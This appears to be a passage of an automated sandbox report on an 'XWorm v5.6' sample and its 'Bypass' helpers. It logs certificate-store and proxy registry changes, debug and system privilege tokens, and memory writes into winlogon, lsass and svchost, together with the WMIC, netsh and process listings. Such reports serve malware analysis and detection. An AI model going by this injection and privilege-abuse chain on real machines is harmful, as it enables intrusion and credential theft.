Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3564 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 3564 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 3564 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 3564 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 3564 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 3564 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1452 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1452 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 4176 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 3440 wrote to memory of 4336 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 3440 wrote to memory of 4336 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4176 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4760 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4760 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4176 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 448 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3252 wrote to memory of 448 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4176 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\System32\Wbem\wmic.exe
PID 4176 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\System32\Wbem\wmic.exe
PID 4176 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4924 wrote to memory of 3480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4924 wrote to memory of 3480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4176 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 2720 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2720 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4176 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2680 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4176 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 3980 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 3980 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 2216 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2216 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2868 wrote to memory of 608 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 2868 wrote to memory of 660 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 2868 wrote to memory of 948 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 316 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\dwm.exe
PID 2868 wrote to memory of 424 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 508 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2868 wrote to memory of 1136 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2868 wrote to memory of 1144 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1152 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2868 wrote to memory of 1160 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1236 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1256 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1304 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1408 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1436 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1604 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2868 wrote to memory of 1612 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe"

